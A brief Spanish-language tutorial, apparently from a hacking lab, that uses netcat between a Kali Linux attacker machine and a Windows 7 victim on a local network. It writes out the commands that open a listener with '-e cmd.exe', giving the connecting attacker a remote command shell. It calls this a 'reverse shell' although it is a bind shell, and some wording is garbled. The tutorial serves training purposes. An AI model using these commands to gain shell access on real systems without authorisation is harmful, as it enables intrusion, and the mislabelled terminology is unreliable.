Como hacer una conexion del lado cliente
Una Conexion del lado del cliente es muy parecida a la Conexion Directa porque es cuando el atacante se conecta a la victima pero la victima nos otorga permisos para usar su terminal desde nuestra maquina.
Nuestro Kali Linux es nuestro S.O como hacker, la maquina del atacante.
El Windows 7 Es la victima de la victima.
Entonces lo que vamos a hacer es una conexion directa que seria que con nuestro Kali nos conectamos al W7.
Ahora lo que vamos a hacer desde w7 es poner el comando
#nc -lvvp "puerto"
nc -lvvp 4447
# lo que hace la flag lvvp es poner netcat en escucha en el puerto 4447
Tambien utilice ipconfig para poder saber mi ip para conectarme desde mi kali linux
Ahi abrimos el puerto 4447 y es la puerta para que el atacante pueda entrar.
Ahora desde Kali linux lo que vamos a hacer es conectarnos mediante netcat.
#nc ip-victima
nc 192.168.0.45 4447
Una vez ejecutemos ese comando va a parecer que no paso nada pero si vamos a la maquina de la victima y hacemos una captura de lo que esta pasando es que tenemos un dispositivo conectado en nuestra maquina.
Ya en este momento hay una comunicacion directa pero no se pueda hacer nada. Asà que ahora vamos a realizar la comunicación del lado del Cliente , para eso agregamos la flag -e que sirve para ejecutar un archivo, .exe, script lo que fuere, la cosa cambia por ejemplo.
Desde la maquina victima escribimos ese comando
nc -lvvp 4440 -e cmd.exe
Abriendo el puerto 4440 y con la flag y el cmd.exe lo que estamos haciendo es que cuando ingrese el atacante , tenga acceso a nuestra linea de comandos desde su maquina. Estamos haciendo una reverse shell.
Todo ese comando desde la maquina del atacante, y miren lo que pasa en la maquina victima.
Justamente se crea la carpeta que hicimos desde la maquina atacante.